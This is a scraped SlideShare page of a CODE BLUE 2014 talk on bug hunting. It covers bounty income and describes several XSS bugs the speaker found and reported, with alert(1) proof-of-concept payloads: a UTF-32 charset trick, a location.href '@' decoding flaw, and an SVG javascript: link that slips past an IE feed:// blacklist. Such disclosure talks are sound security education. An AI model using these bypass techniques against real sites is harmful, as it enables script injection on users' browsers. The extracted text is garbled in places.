SlideShare a Scribd company logo
バグハンター�
の愉しみ	
  
Masato	
  Kinugawa	
  
た	
  の	
  
名前	
   Masato	
  Kinugawa	
  
国籍	
   ⽇日本⼈人(と思われる)	
  
趣味	
   ⾳音楽鑑賞とXSS	
  
職業	
   バグハンター	
  
前	
  
バグハンターの⽣生活と	
  
Bounty	
  Program	
  
中	
   愉しいバグ	
  
後	
   バグハンターになったわけ	
  
CODE BLUE 2014 : バグハンターの愉しみ by キヌガワマサト Masato Kinugawa

Recommended for you

セキュリティを楽しむ(CTFとbugbountyの始め方)
セキュリティを楽しむ(CTFとbugbountyの始め方)セキュリティを楽しむ(CTFとbugbountyの始め方)
セキュリティを楽しむ(CTFとbugbountyの始め方)

Enjoy security (How to start CTF and Bug Bounty!)

securityctfbugbounty
SQLアンチパターン 幻の第26章「とりあえず削除フラグ」
SQLアンチパターン 幻の第26章「とりあえず削除フラグ」SQLアンチパターン 幻の第26章「とりあえず削除フラグ」
SQLアンチパターン 幻の第26章「とりあえず削除フラグ」

SQLアンチパターン 26章「とりあえず削除フラグ」 2015/08/31 @ GMO Yours #ronsakucasual https://atnd.org/events/68902

Twitterのsnowflakeについて
TwitterのsnowflakeについてTwitterのsnowflakeについて
Twitterのsnowflakeについて
職場	
   ⾃自宅宅	
  
勤務時間	
   やる気がある時	
  
仕事	
   セキュリティバグを探す	
  
収⼊入	
   Bug	
  Bounty	
  
➡これだけでやっていける?	
  
CODE BLUE 2014 : バグハンターの愉しみ by キヌガワマサト Masato Kinugawa
27135346	
  円	
  
27135346	
  円	
  
(8進数)	
  

Recommended for you

FridaによるAndroidアプリの動的解析とフッキングの基礎
FridaによるAndroidアプリの動的解析とフッキングの基礎FridaによるAndroidアプリの動的解析とフッキングの基礎
FridaによるAndroidアプリの動的解析とフッキングの基礎

DroidKaigi 2019講演資料

securityandroid
Keycloakの最近のトピック
Keycloakの最近のトピックKeycloakの最近のトピック
Keycloakの最近のトピック

OSSセキュリティ技術の会第8回勉強会資料

keycloakoss
乗っ取れコンテナ!!開発者から見たコンテナセキュリティの考え方(CloudNative Days Tokyo 2021 発表資料)
乗っ取れコンテナ!!開発者から見たコンテナセキュリティの考え方(CloudNative Days Tokyo 2021 発表資料)乗っ取れコンテナ!!開発者から見たコンテナセキュリティの考え方(CloudNative Days Tokyo 2021 発表資料)
乗っ取れコンテナ!!開発者から見たコンテナセキュリティの考え方(CloudNative Days Tokyo 2021 発表資料)

乗っ取れコンテナ!!開発者から見たコンテナセキュリティの考え方 (CloudNative Days Tokyo 2021 発表資料) 2021年11月4日(木) NTTデータ システム技術本部生産技術部 クラウド技術センタ 望月 敬太

kubernetesk8ssecurity
! 2010年年にGoogleが開始	
  
! 様々な企業が続く	
  
! Google	
  Vulnerability	
  Reward	
  Program	
  
! 1バグ	
  =	
  $100~∼20,000	
  
$130,803.7	
  
これまでに獲得した報酬	
  
これまでに報告したバグ	
  
127(重複/⾮非報酬対象を含むと191)	
  
CODE BLUE 2014 : バグハンターの愉しみ by キヌガワマサト Masato Kinugawa
報酬UPでやる気UP!	
  $	
  

Recommended for you

CVE、JVN番号の取得経験者になろう!
CVE、JVN番号の取得経験者になろう!CVE、JVN番号の取得経験者になろう!
CVE、JVN番号の取得経験者になろう!

セキュリティエンジニアの夢!CVE、JVN番号の取得経験者になろう!(私の経験談)

securitycvejvn
PlaySQLAlchemy: SQLAlchemy入門
PlaySQLAlchemy: SQLAlchemy入門PlaySQLAlchemy: SQLAlchemy入門
PlaySQLAlchemy: SQLAlchemy入門

神戸Pythonの会での SQLAlchemy 入門ハンズオンの資料です。 座学パートの多いSQLAlchemy Primerよりもハンズオンに重点を置いて、日本語で書き直しました。

pythonkobesql
テスト文字列に「うんこ」と入れるな
テスト文字列に「うんこ」と入れるなテスト文字列に「うんこ」と入れるな
テスト文字列に「うんこ」と入れるな

2021年にインフィニットループ社内の新卒向け研修で使われた資料です。

development
なんという夜⾏行行性…	
  
CODE BLUE 2014 : バグハンターの愉しみ by キヌガワマサト Masato Kinugawa
! 制度度開始からずっと対応が早い	
  
! 重要度度だけでなくバグの⾯面⽩白さも評価	
  
! 簡潔な説明で問題を理理解してくれる	
  
! 報告者を楽しませてくれる	
  
CODE BLUE 2014 : バグハンターの愉しみ by キヌガワマサト Masato Kinugawa

Recommended for you

SANS Holiday Hack 2017 (非公式ガイド)
SANS Holiday Hack 2017 (非公式ガイド)SANS Holiday Hack 2017 (非公式ガイド)
SANS Holiday Hack 2017 (非公式ガイド)

SANS Holiday Hack Challenge 2017の説明&ヒント https://www.holidayhackchallenge.com/2017/

セキュリティsanssansholidayhack
RSA暗号運用でやってはいけない n のこと #ssmjp
RSA暗号運用でやってはいけない n のこと #ssmjpRSA暗号運用でやってはいけない n のこと #ssmjp
RSA暗号運用でやってはいけない n のこと #ssmjp

2017/02/21 の #ssmjp で発表した際のスライドです。

cryptorsa暗号rsa
最近のやられアプリを試してみた
最近のやられアプリを試してみた最近のやられアプリを試してみた
最近のやられアプリを試してみた

9/21に開催したOWASP Connect in Tokyoにて登壇した時の資料です。

owaspsecurity
! Googleの最重要ドメイン	
  
! 報酬は$5,000(当時の規定を超える額)	
  
https://accounts.google.com/example?oe=utf-‐‑‒32	
  
HTTP/1.1	
  200	
  OK	
  
Alternate-‐‑‒Protocol:	
  443:quic,p=0.01	
  
Cache-‐‑‒Control:	
  private,	
  max-‐‑‒age=0	
  
Content-‐‑‒Encoding:	
  gzip	
  
Content-‐‑‒Type:	
  text/html;	
  charset=UTF-‐‑‒32	
  
...	
  
! URLから⽂文字コードを指定できる	
  
! UTF-‐‑‒32を指定できていた	
  
∀㸀㸀㰀㰀script㸀㸀alert(1)㰀㰀/script㸀㸀�
➊➊	
  バイト値の配置	
  
❷ページの⽂文字コード	
  

Recommended for you

とある診断員とAWS
とある診断員とAWSとある診断員とAWS
とある診断員とAWS

2016/05/17に開催したSecurity-JAWSにて登壇した時の資料です。

イミュータブルデータモデルの極意
イミュータブルデータモデルの極意イミュータブルデータモデルの極意
イミュータブルデータモデルの極意

2021/11/24 「イミュータブルでゆこう」イベントの資料です。 データをリソースとイベントに場合分けして考えようという至極単純な話を1時間ほどしました。

data modeling
Spring Boot × Vue.jsでSPAを作る
Spring Boot × Vue.jsでSPAを作るSpring Boot × Vue.jsでSPAを作る
Spring Boot × Vue.jsでSPAを作る

従来のWebアプリケーションとSPAの違いに着目し、Spring Boot × Vue.jsでSPAを作る際のポイントやハマりどころを紹介します。

spring bootvue.jsspa
00	
  00	
  22	
  00	
  00	
  00	
  3E	
  00	
  00	
  00	
  3C	
  00	
  
00	
  00	
  00	
  73	
  00	
  00	
  00	
  63	
  00	
  00	
  00	
  72	
  
00	
  00	
  00	
  69	
  00	
  00	
  00	
  70	
  00	
  00	
  00	
  74	
  
00	
  00	
  3E	
  00	
  00	
  00	
  00	
  61	
  00	
  00	
  00	
  6C	
  
00	
  00	
  00	
  65	
  00	
  00	
  00	
  72	
  00	
  00	
  00	
  74	
  
00	
  00	
  00	
  28	
  00	
  00	
  00	
  31	
  00	
  00	
  00	
  29	
  
00	
  00	
  3C	
  00	
  00	
  00	
  00	
  2F	
  00	
  00	
  00	
  73	
  
00	
  00	
  00	
  63	
  00	
  00	
  00	
  72	
  00	
  00	
  00	
  69	
  
00	
  00	
  00	
  70	
  00	
  00	
  00	
  74	
  00	
  00	
  3E	
  00	
  
∀㸀㸀㰀㰀�
s  c    r�
i    p    t�
㸀㸀a    l�
e  r    t�
(  1    )�
㰀㰀/    s�
c  r    i�
p  t  㸀㸀�
UTF-‐‑‒32は	
  4バイト	
  で	
  1⽂文字	
  を表現	
  
➊�
IEはUTF-‐‑‒32をサポートしていない	
  
	
  ➡⽂文字コードは勝⼿手に決まるなにか	
  
00	
  00	
  22	
  00	
  00	
  00	
  3E	
  00	
  00	
  00	
  3C	
  00	
  
00	
  00	
  00	
  73	
  00	
  00	
  00	
  63	
  00	
  00	
  00	
  72	
  
00	
  00	
  00	
  69	
  00	
  00	
  00	
  70	
  00	
  00	
  00	
  74	
  
00	
  00	
  3E	
  00	
  00	
  00	
  00	
  61	
  00	
  00	
  00	
  6C	
  
00	
  00	
  00	
  65	
  00	
  00	
  00	
  72	
  00	
  00	
  00	
  74	
  
00	
  00	
  00	
  28	
  00	
  00	
  00	
  31	
  00	
  00	
  00	
  29	
  
00	
  00	
  3C	
  00	
  00	
  00	
  00	
  2F	
  00	
  00	
  00	
  73	
  
00	
  00	
  00	
  63	
  00	
  00	
  00	
  72	
  00	
  00	
  00	
  69	
  
00	
  00	
  00	
  70	
  00	
  00	
  00	
  74	
  00	
  00	
  3E	
  00	
  
∀㸀㸀㰀㰀�
s  c    r�
i    p    t�
㸀㸀a    l�
e  r    t�
(  1    )�
㰀㰀/    s�
c  r    i�
p  t  㸀㸀�
❷
全ブラウザの状況がわかる超凄いサイト	
  
http://l0.cm/encodings/table/	
  
IE(<=9)はこれを無視	
  
	
  ➡00の部分は存在しないのと同じ	
  
00	
  00	
  22	
  00	
  00	
  00	
  3E	
  00	
  00	
  00	
  3C	
  00	
  
00	
  00	
  00	
  73	
  00	
  00	
  00	
  63	
  00	
  00	
  00	
  72	
  
00	
  00	
  00	
  69	
  00	
  00	
  00	
  70	
  00	
  00	
  00	
  74	
  
00	
  00	
  3E	
  00	
  00	
  00	
  00	
  61	
  00	
  00	
  00	
  6C	
  
00	
  00	
  00	
  65	
  00	
  00	
  00	
  72	
  00	
  00	
  00	
  74	
  
00	
  00	
  00	
  28	
  00	
  00	
  00	
  31	
  00	
  00	
  00	
  29	
  
00	
  00	
  3C	
  00	
  00	
  00	
  00	
  2F	
  00	
  00	
  00	
  73	
  
00	
  00	
  00	
  63	
  00	
  00	
  00	
  72	
  00	
  00	
  00	
  69	
  
00	
  00	
  00	
  70	
  00	
  00	
  00	
  74	
  00	
  00	
  3E	
  00	
  
�  >  ��
s  c    r�
i    p  t�
>  a  l�
e  r    t�
(  1    )�
�  /  s�
c  r    i�
p  t  >�
❸

Recommended for you

スマホゲームのチート手法とその対策 [DeNA TechCon 2019]
スマホゲームのチート手法とその対策 [DeNA TechCon 2019]スマホゲームのチート手法とその対策 [DeNA TechCon 2019]
スマホゲームのチート手法とその対策 [DeNA TechCon 2019]

スマホゲームのチートにはメモリの改ざんを利用するお手軽なものに始まり、パケットの改ざんやコードの改ざんまで、多様な手法が存在します。しかし、それらがインターネットや書籍で語られることは多くはありません。これまでのDeNAのセキュリティチームの経験を基に、それぞれのチート手法を説明したあと、どのように対策をすれば良いのか、ご紹介させていただきます。

 
by DeNA
securitycheat
マイクロにしすぎた結果がこれだよ!
マイクロにしすぎた結果がこれだよ!マイクロにしすぎた結果がこれだよ!
マイクロにしすぎた結果がこれだよ!

This document summarizes a microservices meetup hosted by @mosa_siru. Key points include: 1. @mosa_siru is an engineer at DeNA and CTO of Gunosy. 2. The meetup covered Gunosy's architecture with over 45 GitHub repositories, 30 stacks, 10 Go APIs, and 10 Python batch processes using AWS services like Kinesis, Lambda, SQS and API Gateway. 3. Challenges discussed were managing 30 microservices, ensuring API latency below 50ms across availability zones, and handling 10 requests per second with nginx load balancing across 20 servers.

architecturepythonmicroservices
バグなんて見逃しちゃえ
バグなんて見逃しちゃえバグなんて見逃しちゃえ
バグなんて見逃しちゃえ

りふ 22/6/17 NINNO Tech Fest #7

qaobservabilityjstqb
CODE BLUE 2014 : バグハンターの愉しみ by キヌガワマサト Masato Kinugawa
ブラウザ/プラグインのバグも探す	
  
������1�������
������1�������
������1�������
������1�������
������1�������
������1����1��
������1��1����
������11������
������1�������
������1�������
������1��1����
������1����1��
������1���1���
������1�������������11������
������11������
������1����1��
������1�����1�
������1�������
������1�������
������1����1��
������1�������
������1�������
������1�������
������1�������
������1�������
! ⾃自分の報告のうちの28.7%	
  
! そのうち87%がIEのバグ	
  
! 修正が遅い	
  
! 修正されてもバージョン違いのIEは直さ
れない場合があり問題が残ることも多い	
  
Webサービス側で回避策を取らざるを得ない	
  
こうなると	
  

Recommended for you

イマドキWEBデザイン/140712fsumi
イマドキWEBデザイン/140712fsumiイマドキWEBデザイン/140712fsumi
イマドキWEBデザイン/140712fsumi
1人ソーシャルゲームを作る肝
1人ソーシャルゲームを作る肝1人ソーシャルゲームを作る肝
1人ソーシャルゲームを作る肝
運用leveragesk 開発
ソーシャルゲームを支える技術 ~ クラウドを活用した高負荷対策
ソーシャルゲームを支える技術 ~ クラウドを活用した高負荷対策ソーシャルゲームを支える技術 ~ クラウドを活用した高負荷対策
ソーシャルゲームを支える技術 ~ クラウドを活用した高負荷対策

2012年8月30日に北海道大学で行われた「Cloud Week 2012@北海道大学 ~クラウド技術の最先端を探る~」の講演発表で使用した資料。

クラウドソーシャルゲーム
location.hrefはJavaScriptで	
  
ページのURLを取得する⽅方法の1つ	
  
http://example.com/	
  
http://example.com/	
  
location.hrefは	
  
http://evil%2F@example.com/	
  
location.hrefは	
  
http://evil/@example.com/	
  
@以前が勝⼿手にURLデコードされている!	
  
	
  	
  ➡外部サイトを指すURLができてしまう	
  
location.hrefが⾃自ドメインを指すことを
前提にしたコード全てが潜在的に危ない	
  
@以前に⽂文字列列を⾜足し、外部サイトへの
リクエストが⾶飛ばないか、あらゆるペー
ジを確認してまわってみる	
  
そこで	
  
http://evil%2F@www.youtube.com/	
  

Recommended for you

どたばたかいぎ成果発表
どたばたかいぎ成果発表どたばたかいぎ成果発表
どたばたかいぎ成果発表

Twitter即時話題推定技術「どたばたかいぎ」の2012.10時点での成果発表です。

nlptwitter
座談会資料(趣旨とテーマ)配布用 20151003
座談会資料(趣旨とテーマ)配布用 20151003座談会資料(趣旨とテーマ)配布用 20151003
座談会資料(趣旨とテーマ)配布用 20151003

2015年10月3日開催、第18回八子クラウドの 開催趣旨とテーマ説明用資料です。 資料中から引用される場合は「出典:第18回八子クラウド座談会資料より」と明記して頂けますようお願いします。

iotioecloud
TensorFlow を使った 機械学習ことはじめ (GDG京都 機械学習勉強会)
TensorFlow を使った機械学習ことはじめ (GDG京都 機械学習勉強会)TensorFlow を使った機械学習ことはじめ (GDG京都 機械学習勉強会)
TensorFlow を使った 機械学習ことはじめ (GDG京都 機械学習勉強会)

TensorFlow の基本的な使い方やコーディング方法を、線形重回帰やロジスティック回帰、パーセプトロンの実装例を通じて解説しています。(機械学習初心者向け) ※2016/02/27に開催した「GDG京都 機械学習勉強会」で発表した資料です。

machine learningtensorflow
! ついでに⾒見見つけた致命的なバグ	
  
! RSSを表⽰示するfeed://	
  URLに存在	
  
! URLの@以前を細⼯工することで無関係の
フィードを任意のドメインに展開できる	
  
! 無関係のフィードにスクリプトを紛れ込
ませておけば展開後のドメイン上で動く	
  
どのサイトでもXSSできる\(^o^)/ヤッタァ☆	
  
つまり	
  
feed://	
  URLではスクリプト実⾏行行が可能な	
  
⽂文字列列を除去する形で制限している	
  
(=ブラックリスト)	
  
ブラックリストを抜けるだけの簡単なお仕事!	
  
やることは	
  
<a	
  href="javascript:alert(1)">XSS</a>	
  
<a>XSS</a>	
  
除去パターンから抜けられそうな⽂文字列列を導き出す	
  
ブ ー ー ー	
  
<svg>�
<a	
  xmlns:xlink="http://www.w3.org/1999/
xlink"�
xlink:href="javascript:alert(1)">�
<rect	
  width="1000"	
  height="1000"	
  />�
</a>�
</svg>	
   シ ー ン	
  

Recommended for you

「モデル検査」のススメ (ゲームシナリオ進行編)
「モデル検査」のススメ (ゲームシナリオ進行編)「モデル検査」のススメ (ゲームシナリオ進行編)
「モデル検査」のススメ (ゲームシナリオ進行編)

CEDEC2013「『モデル検査』のススメ (ゲームシナリオ進行編)」講演スライド増補版

model
Recent Progress in Machine Translation between Japanese and Others, by Mick E...
Recent Progress in Machine Translation between Japanese and Others, by Mick E...Recent Progress in Machine Translation between Japanese and Others, by Mick E...
Recent Progress in Machine Translation between Japanese and Others, by Mick E...

The presentation reports the state-of-the-art technologies of Mirai Translate related to Japanese and non-Japanese machine translation.Those technologies include a pre-processing method for language structure canonicalization and a large scale parallel processing of 250 Million corpus. We also see the current translation performance from Japanese to English in view of Test of English for International Communication (TOEIC) score.

translationtranslation technologytranslation automation
虎の穴ラボ エンジニア採用説明資料
虎の穴ラボ エンジニア採用説明資料虎の穴ラボ エンジニア採用説明資料
虎の穴ラボ エンジニア採用説明資料

虎の穴ラボ株式会社のエンジニア採用説明資料になります。 プロダクト紹介、開発体制紹介、福利厚生や社内制度の紹介等を記載してます。

採用エンジニア会社紹介
feed://l0.cm%2Fcb.rss%3F@codeblue.jp/	
  
feed://l0.cm%2Fcb.rss%3F@codeblue.jp/	
  
alert('CODE	
  BLUE、2回⽬目開催おめでとう!n'+	
  
document.domain+'から')	
  
! ⽂文字コード、ブラウザの挙動/バグと
いった様々な要因で危険にさらされる	
  
! 複雑怪奇なバグの発⾒見見こそ最⾼高の愉しみ	
  
もっと興味がある?	
  
http://masatokinugawa.l0.cm/	
  
CODE BLUE 2014 : バグハンターの愉しみ by キヌガワマサト Masato Kinugawa

Recommended for you

虎の穴ラボ エンジニア採用説明資料
虎の穴ラボ エンジニア採用説明資料 虎の穴ラボ エンジニア採用説明資料
虎の穴ラボ エンジニア採用説明資料

虎の穴ラボ株式会社のエンジニア採用説明資料になります。 プロダクト紹介、開発体制紹介、福利厚生や社内制度の紹介等を記載してます。

company profilesemploymentエンジニア
虎の穴ラボ エンジニア採用説明資料 .pdf
虎の穴ラボ エンジニア採用説明資料 .pdf虎の穴ラボ エンジニア採用説明資料 .pdf
虎の穴ラボ エンジニア採用説明資料 .pdf

虎の穴ラボ株式会社のエンジニア採用説明資料になります。 プロダクト紹介、開発体制紹介、福利厚生や社内制度の紹介等を記載してます。

recruitingエンジニアエンジニア採用
赤外線センサーを使ったインタラクティブコンテンツ
赤外線センサーを使ったインタラクティブコンテンツ赤外線センサーを使ったインタラクティブコンテンツ
赤外線センサーを使ったインタラクティブコンテンツ

かごしまITフェスタ2014 KISAセミナー

kinect2kinectopenni
! ⼩小さい頃からコンピュータを触って育つ	
  
! 何でも分解することが好き	
  
! XSSデビューは⼩小6のとき	
  
! ⼩小さい頃からコンピュータを触って育つ	
  
	
  ➡	
  2進数の何たるかを知ったのが2009年年	
  
! 何でも分解することが好き	
  
	
  ➡	
  別に好きじゃない	
  
! XSSデビューは⼩小6のとき	
  
	
  ➡	
  セキュリティへの⽬目覚めは2009年年	
  
やりたいことを好きにやろうと決める�
楽しさを⾒見見出せない毎⽇日�
〜~2009	
   いろいろあった	
  
  2010	
   情報系専⾨門学校を中退	
  
やりたいこと:  脆弱性を探しまくりたい	
  
やたら⾒見見つけられる⾃自分がいた!	
  
しばらくしてGoogleが報酬制度度を始める	
  
起きているうちは脆弱性探しに没頭	
  

Recommended for you

gooスマホ部について0707
gooスマホ部について0707gooスマホ部について0707
gooスマホ部について0707
cluboshietegoogoo
Why typed
Why typedWhy typed
Why typed

みんな、なぜ「型」にこだわるのか理解しました。

programminglispmeetup
Programmer @jc-21 2014/03/29
Programmer @jc-21 2014/03/29Programmer @jc-21 2014/03/29
Programmer @jc-21 2014/03/29
programmeropen campusandroid
CODE BLUE 2014 : バグハンターの愉しみ by キヌガワマサト Masato Kinugawa
! やりたいことをやっていた先にあった	
  
! 気付いたらそうなっていた	
  
今後の展望	
  
結婚して主夫しながらバグ探し?	
  
	
  	
  ➡⼥女女⼦子ハントのスキルをつける必要がある	
  
! 多くの時間は単純な検証の反復復	
  
! 発⾒見見できなければ収⼊入無し	
  
! 成果が直接報酬になる達成感は⼤大きい	
  
! 隠れた財宝を発掘したような喜びは他で
は味わえない	
  
! 異異常な動作は最⾼高に愉しい	
  
それでも	
  
探せるスキルが全て	
  
スキルを磨くことだけに注⼒力力すればいい	
  
1⼈人でできる	
  
⼈人間関係の悩みも少ない	
  
⾃自宅宅でできる	
  
通勤時間ゼロ分	
  
マイペースにできる	
  
やる気がある時にやる	
  

Recommended for you

座談会資料(趣旨とあゆみ)配布用 20150321
座談会資料(趣旨とあゆみ)配布用 20150321座談会資料(趣旨とあゆみ)配布用 20150321
座談会資料(趣旨とあゆみ)配布用 20150321

2015年3月21日開催、第16回八子クラウド座談会資料。 開催趣旨とこれまでの歩みをつづった事前配布資料。

クラウド
座談会資料(事前配布) 20161217
座談会資料(事前配布) 20161217座談会資料(事前配布) 20161217
座談会資料(事前配布) 20161217

2016年12月17日開催、第22回八子クラウド座談会の事前配付資料です。

cloudクラウド日本
  趣味で「⾳音楽を聴く」	
  
  趣味で「バグハントする」(上と同じ)	
  
「趣味」	
  
とにかく好きなことをしていると光が	
  
⾒見見えるかもしれない!	
  
何かに迷っている⼈人へ	
  
わかっていただけた
でしょうか?!	
  
ありがとう!	
  
@kinugawamasato	
  
✉	
   masatokinugawa	
  [at]	
  gmail.com	
  
Contact	
  

More Related Content

What's hot

新入社員のための大規模ゲーム開発入門 サーバサイド編
新入社員のための大規模ゲーム開発入門 サーバサイド編新入社員のための大規模ゲーム開発入門 サーバサイド編
新入社員のための大規模ゲーム開発入門 サーバサイド編
infinite_loop
 
例外設計における大罪
例外設計における大罪例外設計における大罪
例外設計における大罪
Takuto Wada
 
ウェブセキュリティのありがちな誤解を解説する
ウェブセキュリティのありがちな誤解を解説するウェブセキュリティのありがちな誤解を解説する
ウェブセキュリティのありがちな誤解を解説する
Hiroshi Tokumaru
 
セキュリティを楽しむ(CTFとbugbountyの始め方)
セキュリティを楽しむ(CTFとbugbountyの始め方)セキュリティを楽しむ(CTFとbugbountyの始め方)
セキュリティを楽しむ(CTFとbugbountyの始め方)
kazkiti
 
SQLアンチパターン 幻の第26章「とりあえず削除フラグ」
SQLアンチパターン 幻の第26章「とりあえず削除フラグ」SQLアンチパターン 幻の第26章「とりあえず削除フラグ」
SQLアンチパターン 幻の第26章「とりあえず削除フラグ」
Takuto Wada
 
Twitterのsnowflakeについて
TwitterのsnowflakeについてTwitterのsnowflakeについて
Twitterのsnowflakeについて
moai kids
 
FridaによるAndroidアプリの動的解析とフッキングの基礎
FridaによるAndroidアプリの動的解析とフッキングの基礎FridaによるAndroidアプリの動的解析とフッキングの基礎
FridaによるAndroidアプリの動的解析とフッキングの基礎
ken_kitahara
 
Keycloakの最近のトピック
Keycloakの最近のトピックKeycloakの最近のトピック
Keycloakの最近のトピック
Hitachi, Ltd. OSS Solution Center.
 
乗っ取れコンテナ!!開発者から見たコンテナセキュリティの考え方(CloudNative Days Tokyo 2021 発表資料)
乗っ取れコンテナ!!開発者から見たコンテナセキュリティの考え方(CloudNative Days Tokyo 2021 発表資料)乗っ取れコンテナ!!開発者から見たコンテナセキュリティの考え方(CloudNative Days Tokyo 2021 発表資料)
乗っ取れコンテナ!!開発者から見たコンテナセキュリティの考え方(CloudNative Days Tokyo 2021 発表資料)
NTT DATA Technology & Innovation
 
CVE、JVN番号の取得経験者になろう!
CVE、JVN番号の取得経験者になろう!CVE、JVN番号の取得経験者になろう!
CVE、JVN番号の取得経験者になろう!
kazkiti
 
PlaySQLAlchemy: SQLAlchemy入門
PlaySQLAlchemy: SQLAlchemy入門PlaySQLAlchemy: SQLAlchemy入門
PlaySQLAlchemy: SQLAlchemy入門
泰 増田
 
テスト文字列に「うんこ」と入れるな
テスト文字列に「うんこ」と入れるなテスト文字列に「うんこ」と入れるな
テスト文字列に「うんこ」と入れるな
Kentaro Matsui
 
SANS Holiday Hack 2017 (非公式ガイド)
SANS Holiday Hack 2017 (非公式ガイド)SANS Holiday Hack 2017 (非公式ガイド)
SANS Holiday Hack 2017 (非公式ガイド)
Isaac Mathis
 
RSA暗号運用でやってはいけない n のこと #ssmjp
RSA暗号運用でやってはいけない n のこと #ssmjpRSA暗号運用でやってはいけない n のこと #ssmjp
RSA暗号運用でやってはいけない n のこと #ssmjp
sonickun
 
最近のやられアプリを試してみた
最近のやられアプリを試してみた最近のやられアプリを試してみた
最近のやられアプリを試してみた
zaki4649
 
とある診断員とAWS
とある診断員とAWSとある診断員とAWS
とある診断員とAWS
zaki4649
 
イミュータブルデータモデルの極意
イミュータブルデータモデルの極意イミュータブルデータモデルの極意
イミュータブルデータモデルの極意
Yoshitaka Kawashima
 
Spring Boot × Vue.jsでSPAを作る
Spring Boot × Vue.jsでSPAを作るSpring Boot × Vue.jsでSPAを作る
Spring Boot × Vue.jsでSPAを作る
Go Miyasaka
 
スマホゲームのチート手法とその対策 [DeNA TechCon 2019]
スマホゲームのチート手法とその対策 [DeNA TechCon 2019]スマホゲームのチート手法とその対策 [DeNA TechCon 2019]
スマホゲームのチート手法とその対策 [DeNA TechCon 2019]
DeNA
 
マイクロにしすぎた結果がこれだよ!
マイクロにしすぎた結果がこれだよ!マイクロにしすぎた結果がこれだよ!
マイクロにしすぎた結果がこれだよ!
mosa siru
 

What's hot (20)

新入社員のための大規模ゲーム開発入門 サーバサイド編
新入社員のための大規模ゲーム開発入門 サーバサイド編新入社員のための大規模ゲーム開発入門 サーバサイド編
新入社員のための大規模ゲーム開発入門 サーバサイド編
 
例外設計における大罪
例外設計における大罪例外設計における大罪
例外設計における大罪
 
ウェブセキュリティのありがちな誤解を解説する
ウェブセキュリティのありがちな誤解を解説するウェブセキュリティのありがちな誤解を解説する
ウェブセキュリティのありがちな誤解を解説する
 
セキュリティを楽しむ(CTFとbugbountyの始め方)
セキュリティを楽しむ(CTFとbugbountyの始め方)セキュリティを楽しむ(CTFとbugbountyの始め方)
セキュリティを楽しむ(CTFとbugbountyの始め方)
 
SQLアンチパターン 幻の第26章「とりあえず削除フラグ」
SQLアンチパターン 幻の第26章「とりあえず削除フラグ」SQLアンチパターン 幻の第26章「とりあえず削除フラグ」
SQLアンチパターン 幻の第26章「とりあえず削除フラグ」
 
Twitterのsnowflakeについて
TwitterのsnowflakeについてTwitterのsnowflakeについて
Twitterのsnowflakeについて
 
FridaによるAndroidアプリの動的解析とフッキングの基礎
FridaによるAndroidアプリの動的解析とフッキングの基礎FridaによるAndroidアプリの動的解析とフッキングの基礎
FridaによるAndroidアプリの動的解析とフッキングの基礎
 
Keycloakの最近のトピック
Keycloakの最近のトピックKeycloakの最近のトピック
Keycloakの最近のトピック
 
乗っ取れコンテナ!!開発者から見たコンテナセキュリティの考え方(CloudNative Days Tokyo 2021 発表資料)
乗っ取れコンテナ!!開発者から見たコンテナセキュリティの考え方(CloudNative Days Tokyo 2021 発表資料)乗っ取れコンテナ!!開発者から見たコンテナセキュリティの考え方(CloudNative Days Tokyo 2021 発表資料)
乗っ取れコンテナ!!開発者から見たコンテナセキュリティの考え方(CloudNative Days Tokyo 2021 発表資料)
 
CVE、JVN番号の取得経験者になろう!
CVE、JVN番号の取得経験者になろう!CVE、JVN番号の取得経験者になろう!
CVE、JVN番号の取得経験者になろう!
 
PlaySQLAlchemy: SQLAlchemy入門
PlaySQLAlchemy: SQLAlchemy入門PlaySQLAlchemy: SQLAlchemy入門
PlaySQLAlchemy: SQLAlchemy入門
 
テスト文字列に「うんこ」と入れるな
テスト文字列に「うんこ」と入れるなテスト文字列に「うんこ」と入れるな
テスト文字列に「うんこ」と入れるな
 
SANS Holiday Hack 2017 (非公式ガイド)
SANS Holiday Hack 2017 (非公式ガイド)SANS Holiday Hack 2017 (非公式ガイド)
SANS Holiday Hack 2017 (非公式ガイド)
 
RSA暗号運用でやってはいけない n のこと #ssmjp
RSA暗号運用でやってはいけない n のこと #ssmjpRSA暗号運用でやってはいけない n のこと #ssmjp
RSA暗号運用でやってはいけない n のこと #ssmjp
 
最近のやられアプリを試してみた
最近のやられアプリを試してみた最近のやられアプリを試してみた
最近のやられアプリを試してみた
 
とある診断員とAWS
とある診断員とAWSとある診断員とAWS
とある診断員とAWS
 
イミュータブルデータモデルの極意
イミュータブルデータモデルの極意イミュータブルデータモデルの極意
イミュータブルデータモデルの極意
 
Spring Boot × Vue.jsでSPAを作る
Spring Boot × Vue.jsでSPAを作るSpring Boot × Vue.jsでSPAを作る
Spring Boot × Vue.jsでSPAを作る
 
スマホゲームのチート手法とその対策 [DeNA TechCon 2019]
スマホゲームのチート手法とその対策 [DeNA TechCon 2019]スマホゲームのチート手法とその対策 [DeNA TechCon 2019]
スマホゲームのチート手法とその対策 [DeNA TechCon 2019]
 
マイクロにしすぎた結果がこれだよ!
マイクロにしすぎた結果がこれだよ!マイクロにしすぎた結果がこれだよ!
マイクロにしすぎた結果がこれだよ!
 

Similar to CODE BLUE 2014 : バグハンターの愉しみ by キヌガワマサト Masato Kinugawa

バグなんて見逃しちゃえ
バグなんて見逃しちゃえバグなんて見逃しちゃえ
バグなんて見逃しちゃえ
ssuser0be501
 
イマドキWEBデザイン/140712fsumi
イマドキWEBデザイン/140712fsumiイマドキWEBデザイン/140712fsumi
イマドキWEBデザイン/140712fsumi
Takashi Kitamura
 
1人ソーシャルゲームを作る肝
1人ソーシャルゲームを作る肝1人ソーシャルゲームを作る肝
1人ソーシャルゲームを作る肝
leverages_event
 
ソーシャルゲームを支える技術 ~ クラウドを活用した高負荷対策
ソーシャルゲームを支える技術 ~ クラウドを活用した高負荷対策ソーシャルゲームを支える技術 ~ クラウドを活用した高負荷対策
ソーシャルゲームを支える技術 ~ クラウドを活用した高負荷対策
infinite_loop
 
どたばたかいぎ成果発表
どたばたかいぎ成果発表どたばたかいぎ成果発表
どたばたかいぎ成果発表
Eric Sartre
 
座談会資料(趣旨とテーマ)配布用 20151003
座談会資料(趣旨とテーマ)配布用 20151003座談会資料(趣旨とテーマ)配布用 20151003
座談会資料(趣旨とテーマ)配布用 20151003
知礼 八子
 
TensorFlow を使った 機械学習ことはじめ (GDG京都 機械学習勉強会)
TensorFlow を使った機械学習ことはじめ (GDG京都 機械学習勉強会)TensorFlow を使った機械学習ことはじめ (GDG京都 機械学習勉強会)
